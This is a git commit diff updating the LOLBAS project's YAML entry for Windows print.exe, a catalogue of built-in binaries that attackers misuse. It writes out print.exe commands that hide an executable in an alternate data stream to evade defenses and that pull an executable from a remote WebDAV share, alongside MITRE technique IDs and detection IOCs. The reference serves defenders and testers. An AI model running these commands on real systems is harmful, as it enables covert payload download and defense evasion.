mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
Changed all OSBinaries according to the new template
This commit is contained in:
@@ -1,23 +1,45 @@
|
||||
---
|
||||
Name: Print.exe
|
||||
Description: Download, Copy, Add ADS
|
||||
Author: ''
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
|
||||
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
|
||||
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
|
||||
Usecase: Copy/Download file from remote server
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\print.exe
|
||||
- C:\Windows\SysWOW64\print.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
- IOC: Print.exe creating executable files on disk
|
||||
Resources:
|
||||
- https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||
- https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://twitter.com/Oddvarmoe/status/985518877076541440
|
||||
- Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
Reference in New Issue
Block a user